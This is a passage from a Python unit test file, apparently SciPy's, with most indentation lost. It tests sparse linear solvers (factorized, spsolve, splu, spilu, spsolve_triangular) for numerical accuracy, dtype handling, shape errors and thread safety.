with assert_raises(TypeError, match="Cannot cast array data"):
solve(b.astype(t))
@pytest.mark.skipif(not has_umfpack, reason="umfpack not available")
def test_call_with_cast_to_complex_with_umfpack(self):
use_solver(useUmfpack=True)
solve = factorized(self.A)
b = random.rand(4)
for t in [np.complex64, np.complex128]:
assert_warns(np.ComplexWarning, solve, b.astype(t))
@pytest.mark.skipif(not has_umfpack, reason="umfpack not available")
def test_assume_sorted_indices_flag(self):
# a sparse matrix with unsorted indices
unsorted_inds = np.array([2, 0, 1, 0])
data = np.array([10, 16, 5, 0.4])
indptr = np.array([0, 1, 2, 4])
A = csc_matrix((data, unsorted_inds, indptr), (3, 3))
b = ones(3)
# should raise when incorrectly assuming indices are sorted
use_solver(useUmfpack=True, assumeSortedIndices=True)
with assert_raises(RuntimeError,
match="UMFPACK_ERROR_invalid_matrix"):
factorized(A)
# should sort indices and succeed when not assuming indices are sorted
use_solver(useUmfpack=True, assumeSortedIndices=False)
expected = splu(A.copy()).solve(b)
assert_equal(A.has_sorted_indices, 0)
assert_array_almost_equal(factorized(A)(b), expected)
@pytest.mark.slow
@pytest.mark.skipif(not has_umfpack, reason="umfpack not available")
def test_bug_8278(self):
check_free_memory(8000)
use_solver(useUmfpack=True)
A, b = setup_bug_8278()
A = A.tocsc()
f = factorized(A)
x = f(b)
assert_array_almost_equal(A @ x, b)
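# Tests for spsolve(): singular input, shape handling, dtype promotion and
# sparsity preservation.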
class TestLinsolve(object):
def setup_method(self):
use_solver(useUmfpack=False)
def test_singular(self):
A = csc_matrix((5,5), dtype='d')
b = array([1, 2, 3, 4, 5],dtype='d')
with suppress_warnings() as sup:
sup.filter(MatrixRankWarning, "Matrix is exactly singular")
x = spsolve(A, b)
assert_(not np.isfinite(x).any())
def test_singular_gh_3312(self):
# "Bad" test case that leads SuperLU to call LAPACK with invalid
# arguments. Check that it fails moderately gracefully.
ij = np.array([(17, 0), (17, 6), (17, 12), (10, 13)], dtype=np.int32)
v = np.array([0.284213, 0.94933781, 0.15767017, 0.38797296])
A = csc_matrix((v, ij.T), shape=(20, 20))
b = np.arange(20)
try:
            # should either raise a RuntimeError or return a value
            # appropriate for singular input
x = spsolve(A, b)
assert_(not np.isfinite(x).any())
except RuntimeError:
pass
def test_twodiags(self):
A = spdiags([[1, 2, 3, 4, 5], [6, 5, 8, 9, 10]], [0, 1], 5, 5)
b = array([1, 2, 3, 4, 5])
# condition number of A
cond_A = norm(A.todense(),2) * norm(inv(A.todense()),2)
for t in ['f','d','F','D']:
eps = finfo(t).eps # floating point epsilon
b = b.astype(t)
for format in ['csc','csr']:
Asp = A.astype(t).asformat(format)
x = spsolve(Asp,b)
assert_(norm(b - Asp*x) < 10 * cond_A * eps)
def test_bvector_smoketest(self):
Adense = array([[0., 1., 1.],
[1., 0., 1.],
[0., 0., 1.]])
As = csc_matrix(Adense)
random.seed(1234)
x = random.randn(3)
b = As*x
x2 = spsolve(As, b)
assert_array_almost_equal(x, x2)
def test_bmatrix_smoketest(self):
Adense = array([[0., 1., 1.],
[1., 0., 1.],
[0., 0., 1.]])
As = csc_matrix(Adense)
random.seed(1234)
x = random.randn(3, 4)
Bdense = As.dot(x)
Bs = csc_matrix(Bdense)
x2 = spsolve(As, Bs)
assert_array_almost_equal(x, x2.todense())
@sup_sparse_efficiency
def test_non_square(self):
# A is not square.
A = ones((3, 4))
b = ones((4, 1))
assert_raises(ValueError, spsolve, A, b)
# A2 and b2 have incompatible shapes.
A2 = csc_matrix(eye(3))
b2 = array([1.0, 2.0])
assert_raises(ValueError, spsolve, A2, b2)
@sup_sparse_efficiency
def test_example_comparison(self):
row = array([0,0,1,2,2,2])
col = array([0,2,2,0,1,2])
data = array([1,2,3,-4,5,6])
sM = csr_matrix((data,(row,col)), shape=(3,3), dtype=float)
M = sM.todense()
row = array([0,0,1,1,0,0])
col = array([0,2,1,1,0,0])
data = array([1,1,1,1,1,1])
sN = csr_matrix((data, (row,col)), shape=(3,3), dtype=float)
N = sN.todense()
sX = spsolve(sM, sN)
X = scipy.linalg.solve(M, N)
assert_array_almost_equal(X, sX.todense())
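    # Exercise spsolve() with many right-hand-side types and shapes and check
    # the dense-vs-sparse output conventions for each.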
@sup_sparse_efficiency
@pytest.mark.skipif(not has_umfpack, reason="umfpack not available")
def test_shape_compatibility(self):
use_solver(useUmfpack=True)
A = csc_matrix([[1., 0], [0, 2]])
bs = [
[1, 6],
array([1, 6]),
[[1], [6]],
array([[1], [6]]),
csc_matrix([[1], [6]]),
csr_matrix([[1], [6]]),
dok_matrix([[1], [6]]),
bsr_matrix([[1], [6]]),
array([[1., 2., 3.], [6., 8., 10.]]),
csc_matrix([[1., 2., 3.], [6., 8., 10.]]),
csr_matrix([[1., 2., 3.], [6., 8., 10.]]),
dok_matrix([[1., 2., 3.], [6., 8., 10.]]),
bsr_matrix([[1., 2., 3.], [6., 8., 10.]]),
]
for b in bs:
x = np.linalg.solve(A.toarray(), toarray(b))
for spmattype in [csc_matrix, csr_matrix, dok_matrix, lil_matrix]:
x1 = spsolve(spmattype(A), b, use_umfpack=True)
x2 = spsolve(spmattype(A), b, use_umfpack=False)
# check solution
if x.ndim == 2 and x.shape[1] == 1:
                    # spsolve also treats these as "vectors", so flatten for comparison
x = x.ravel()
assert_array_almost_equal(toarray(x1), x, err_msg=repr((b, spmattype, 1)))
assert_array_almost_equal(toarray(x2), x, err_msg=repr((b, spmattype, 2)))
# dense vs. sparse output ("vectors" are always dense)
if isspmatrix(b) and x.ndim > 1:
assert_(isspmatrix(x1), repr((b, spmattype, 1)))
assert_(isspmatrix(x2), repr((b, spmattype, 2)))
else:
assert_(isinstance(x1, np.ndarray), repr((b, spmattype, 1)))
assert_(isinstance(x2, np.ndarray), repr((b, spmattype, 2)))
# check output shape
if x.ndim == 1:
# "vector"
assert_equal(x1.shape, (A.shape[1],))
assert_equal(x2.shape, (A.shape[1],))
else:
# "matrix"
assert_equal(x1.shape, x.shape)
assert_equal(x2.shape, x.shape)
A = csc_matrix((3, 3))
b = csc_matrix((1, 3))
assert_raises(ValueError, spsolve, A, b)
@sup_sparse_efficiency
def test_ndarray_support(self):
A = array([[1., 2.], [2., 0.]])
x = array([[1., 1.], [0.5, -0.5]])
b = array([[2., 0.], [2., 2.]])
assert_array_almost_equal(x, spsolve(A, b))
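    # Feed malformed arrays straight to the low-level _superlu.gssv wrapper and
    # check that it raises instead of crashing.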
def test_gssv_badinput(self):
N = 10
d = arange(N) + 1.0
A = spdiags((d, 2*d, d[::-1]), (-3, 0, 5), N, N)
for spmatrix in (csc_matrix, csr_matrix):
A = spmatrix(A)
b = np.arange(N)
def not_c_contig(x):
return x.repeat(2)[::2]
def not_1dim(x):
return x[:,None]
def bad_type(x):
return x.astype(bool)
def too_short(x):
return x[:-1]
badops = [not_c_contig, not_1dim, bad_type, too_short]
for badop in badops:
msg = f"{spmatrix!r} {badop!r}"
# Not C-contiguous
assert_raises((ValueError, TypeError), _superlu.gssv,
N, A.nnz, badop(A.data), A.indices, A.indptr,
b, int(spmatrix == csc_matrix), err_msg=msg)
assert_raises((ValueError, TypeError), _superlu.gssv,
N, A.nnz, A.data, badop(A.indices), A.indptr,
b, int(spmatrix == csc_matrix), err_msg=msg)
assert_raises((ValueError, TypeError), _superlu.gssv,
N, A.nnz, A.data, A.indices, badop(A.indptr),
b, int(spmatrix == csc_matrix), err_msg=msg)
def test_sparsity_preservation(self):
ident = csc_matrix([
[1, 0, 0],
[0, 1, 0],
[0, 0, 1]])
b = csc_matrix([
[0, 1],
[1, 0],
[0, 0]])
x = spsolve(ident, b)
assert_equal(ident.nnz, 3)
assert_equal(b.nnz, 2)
assert_equal(x.nnz, 2)
assert_allclose(x.A, b.A, atol=1e-12, rtol=1e-12)
def test_dtype_cast(self):
A_real = scipy.sparse.csr_matrix([[1, 2, 0],
[0, 0, 3],
[4, 0, 5]])
A_complex = scipy.sparse.csr_matrix([[1, 2, 0],
[0, 0, 3],
[4, 0, 5 + 1j]])
b_real = np.array([1,1,1])
b_complex = np.array([1,1,1]) + 1j*np.array([1,1,1])
x = spsolve(A_real, b_real)
assert_(np.issubdtype(x.dtype, np.floating))
x = spsolve(A_real, b_complex)
assert_(np.issubdtype(x.dtype, np.complexfloating))
x = spsolve(A_complex, b_real)
assert_(np.issubdtype(x.dtype, np.complexfloating))
x = spsolve(A_complex, b_complex)
assert_(np.issubdtype(x.dtype, np.complexfloating))
@pytest.mark.slow
@pytest.mark.skipif(not has_umfpack, reason="umfpack not available")
def test_bug_8278(self):
check_free_memory(8000)
use_solver(useUmfpack=True)
A, b = setup_bug_8278()
x = spsolve(A, b)
assert_array_almost_equal(A @ x, b)
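# Tests for splu() and spilu() (SuperLU complete and incomplete LU factorizations).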
class TestSplu(object):
def setup_method(self):
use_solver(useUmfpack=False)
n = 40
d = arange(n) + 1
self.n = n
self.A = spdiags((d, 2*d, d[::-1]), (-3, 0, 5), n, n)
random.seed(1234)
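    # Shared harness: factorize A with the given routine and check solves for
    # several right-hand-side shapes, including the 'T' and 'H' transpose modes.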
def _smoketest(self, spxlu, check, dtype):
if np.issubdtype(dtype, np.complexfloating):
A = self.A + 1j*self.A.T
else:
A = self.A
A = A.astype(dtype)
lu = spxlu(A)
rng = random.RandomState(1234)
# Input shapes
for k in [None, 1, 2, self.n, self.n+2]:
msg = f"k={k!r}"
if k is None:
b = rng.rand(self.n)
else:
b = rng.rand(self.n, k)
if np.issubdtype(dtype, np.complexfloating):
b = b + 1j*rng.rand(*b.shape)
b = b.astype(dtype)
x = lu.solve(b)
check(A, b, x, msg)
x = lu.solve(b, 'T')
check(A.T, b, x, msg)
x = lu.solve(b, 'H')
check(A.T.conj(), b, x, msg)
@sup_sparse_efficiency
def test_splu_smoketest(self):
self._internal_test_splu_smoketest()
def _internal_test_splu_smoketest(self):
# Check that splu works at all
def check(A, b, x, msg=""):
eps = np.finfo(A.dtype).eps
r = A * x
assert_(abs(r - b).max() < 1e3*eps, msg)
self._smoketest(splu, check, np.float32)
self._smoketest(splu, check, np.float64)
self._smoketest(splu, check, np.complex64)
self._smoketest(splu, check, np.complex128)
@sup_sparse_efficiency
def test_spilu_smoketest(self):
self._internal_test_spilu_smoketest()
def _internal_test_spilu_smoketest(self):
errors = []
def check(A, b, x, msg=""):
r = A * x
err = abs(r - b).max()
assert_(err < 1e-2, msg)
if b.dtype in (np.float64, np.complex128):
errors.append(err)
self._smoketest(spilu, check, np.float32)
self._smoketest(spilu, check, np.float64)
self._smoketest(spilu, check, np.complex64)
self._smoketest(spilu, check, np.complex128)
assert_(max(errors) > 1e-5)
@sup_sparse_efficiency
def test_spilu_drop_rule(self):
# Test passing in the drop_rule argument to spilu.
A = identity(2)
rules = [
b'basic,area'.decode('ascii'), # unicode
b'basic,area', # ascii
[b'basic', b'area'.decode('ascii')]
]
for rule in rules:
# Argument should be accepted
assert_(isinstance(spilu(A, drop_rule=rule), SuperLU))
def test_splu_nnz0(self):
A = csc_matrix((5,5), dtype='d')
assert_raises(RuntimeError, splu, A)
def test_spilu_nnz0(self):
A = csc_matrix((5,5), dtype='d')
assert_raises(RuntimeError, spilu, A)
def test_splu_basic(self):
# Test basic splu functionality.
n = 30
rng = random.RandomState(12)
a = rng.rand(n, n)
a[a < 0.95] = 0
# First test with a singular matrix
a[:, 0] = 0
a_ = csc_matrix(a)
# Matrix is exactly singular
assert_raises(RuntimeError, splu, a_)
        # Make a diagonally dominant, to make sure it is not singular
a += 4*eye(n)
a_ = csc_matrix(a)
lu = splu(a_)
b = ones(n)
x = lu.solve(b)
assert_almost_equal(dot(a, x), b)
def test_splu_perm(self):
# Test the permutation vectors exposed by splu.
n = 30
a = random.random((n, n))
a[a < 0.95] = 0
        # Make a diagonally dominant, to make sure it is not singular
a += 4*eye(n)
a_ = csc_matrix(a)
lu = splu(a_)
# Check that the permutation indices do belong to [0, n-1].
for perm in (lu.perm_r, lu.perm_c):
assert_(all(perm > -1))
assert_(all(perm < n))
assert_equal(len(unique(perm)), len(perm))
# Now make a symmetric, and test that the two permutation vectors are
# the same
# Note: a += a.T relies on undefined behavior.
a = a + a.T
a_ = csc_matrix(a)
lu = splu(a_)
assert_array_equal(lu.perm_r, lu.perm_c)
@pytest.mark.parametrize("splu_fun, rtol", [(splu, 1e-7), (spilu, 1e-1)])
def test_natural_permc(self, splu_fun, rtol):
# Test that the "NATURAL" permc_spec does not permute the matrix
np.random.seed(42)
n = 500
p = 0.01
A = scipy.sparse.random(n, n, p)
x = np.random.rand(n)
        # Make A diagonally dominant to make sure it is not singular
A += (n+1)*scipy.sparse.identity(n)
A_ = csc_matrix(A)
b = A_ @ x
# without permc_spec, permutation is not identity
lu = splu_fun(A_)
assert_(np.any(lu.perm_c != np.arange(n)))
# with permc_spec="NATURAL", permutation is identity
lu = splu_fun(A_, permc_spec="NATURAL")
assert_array_equal(lu.perm_c, np.arange(n))
# Also, lu decomposition is valid
x2 = lu.solve(b)
assert_allclose(x, x2, rtol=rtol)
@pytest.mark.skipif(not hasattr(sys, 'getrefcount'), reason="no sys.getrefcount")
def test_lu_refcount(self):
# Test that we are keeping track of the reference count with splu.
n = 30
a = random.random((n, n))
a[a < 0.95] = 0
        # Make a diagonally dominant, to make sure it is not singular
a += 4*eye(n)
a_ = csc_matrix(a)
lu = splu(a_)
# And now test that we don't have a refcount bug
rc = sys.getrefcount(lu)
for attr in ('perm_r', 'perm_c'):
perm = getattr(lu, attr)
assert_equal(sys.getrefcount(lu), rc + 1)
del perm
assert_equal(sys.getrefcount(lu), rc)
def test_bad_inputs(self):
A = self.A.tocsc()
assert_raises(ValueError, splu, A[:,:4])
assert_raises(ValueError, spilu, A[:,:4])
for lu in [splu(A), spilu(A)]:
b = random.rand(42)
B = random.rand(42, 3)
BB = random.rand(self.n, 3, 9)
assert_raises(ValueError, lu.solve, b)
assert_raises(ValueError, lu.solve, B)
assert_raises(ValueError, lu.solve, BB)
assert_raises(TypeError, lu.solve,
b.astype(np.complex64))
assert_raises(TypeError, lu.solve,
b.astype(np.complex128))
@sup_sparse_efficiency
def test_superlu_dlamch_i386_nan(self):
# SuperLU 4.3 calls some functions returning floats without
        # declaring them. With the i386 Linux calling convention, this fails to
# clear floating point registers after call. As a result, NaN
# can appear in the next floating point operation made.
#
# Here's a test case that triggered the issue.
n = 8
d = np.arange(n) + 1
A = spdiags((d, 2*d, d[::-1]), (-3, 0, 5), n, n)
A = A.astype(np.float32)
spilu(A)
A = A + 1j*A
B = A.A
assert_(not np.isnan(B).any())
@sup_sparse_efficiency
def test_lu_attr(self):
def check(dtype, complex_2=False):
A = self.A.astype(dtype)
if complex_2:
A = A + 1j*A.T
n = A.shape[0]
lu = splu(A)
            # Check that the decomposition is as advertised
Pc = np.zeros((n, n))
Pc[np.arange(n), lu.perm_c] = 1
Pr = np.zeros((n, n))
Pr[lu.perm_r, np.arange(n)] = 1
Ad = A.toarray()
lhs = Pr.dot(Ad).dot(Pc)
rhs = (lu.L * lu.U).toarray()
eps = np.finfo(dtype).eps
assert_allclose(lhs, rhs, atol=100*eps)
check(np.float32)
check(np.float64)
check(np.complex64)
check(np.complex128)
check(np.complex64, True)
check(np.complex128, True)
@pytest.mark.slow
@sup_sparse_efficiency
def test_threads_parallel(self):
oks = []
def worker():
try:
self.test_splu_basic()
self._internal_test_splu_smoketest()
self._internal_test_spilu_smoketest()
oks.append(True)
except Exception:
pass
threads = [threading.Thread(target=worker)
for k in range(20)]
for t in threads:
t.start()
for t in threads:
t.join()
assert_equal(len(oks), 20)
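# Tests for spsolve_triangular().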
class TestSpsolveTriangular(object):
def setup_method(self):
use_solver(useUmfpack=False)
def test_singular(self):
n = 5
A = csr_matrix((n, n))
b = np.arange(n)
for lower in (True, False):
assert_raises(scipy.linalg.LinAlgError, spsolve_triangular, A, b, lower=lower)
@sup_sparse_efficiency
def test_bad_shape(self):
# A is not square.
A = np.zeros((3, 4))
b = ones((4, 1))
assert_raises(ValueError, spsolve_triangular, A, b)
# A2 and b2 have incompatible shapes.
A2 = csr_matrix(eye(3))
b2 = array([1.0, 2.0])
assert_raises(ValueError, spsolve_triangular, A2, b2)
@sup_sparse_efficiency
def test_input_types(self):
A = array([[1., 0.], [1., 2.]])
b = array([[2., 0.], [2., 2.]])
for matrix_type in (array, csc_matrix, csr_matrix):
x = spsolve_triangular(matrix_type(A), b, lower=True)
assert_array_almost_equal(A.dot(x), b)
@pytest.mark.slow
@sup_sparse_efficiency
def test_random(self):
def random_triangle_matrix(n, lower=True):
A = scipy.sparse.random(n, n, density=0.1, format='coo')
if lower:
A = scipy.sparse.tril(A)
else:
A = scipy.sparse.triu(A)
A = A.tocsr(copy=False)
for i in range(n):
A[i, i] = np.random.rand() + 1
return A
np.random.seed(1234)
for lower in (True, False):
for n in (10, 10**2, 10**3):
A = random_triangle_matrix(n, lower=lower)
for m in (1, 10):
for b in (np.random.rand(n, m),
np.random.randint(-9, 9, (n, m)),
np.random.randint(-9, 9, (n, m)) +
np.random.randint(-9, 9, (n, m)) * 1j):
x = spsolve_triangular(A, b, lower=lower)
assert_array_almost_equal(A.dot(x), b)
x = spsolve_triangular(A, b, lower=lower,
unit_diagonal=True)
A.setdiag(1)
assert_array_almost_equal(A.dot(x), b)
|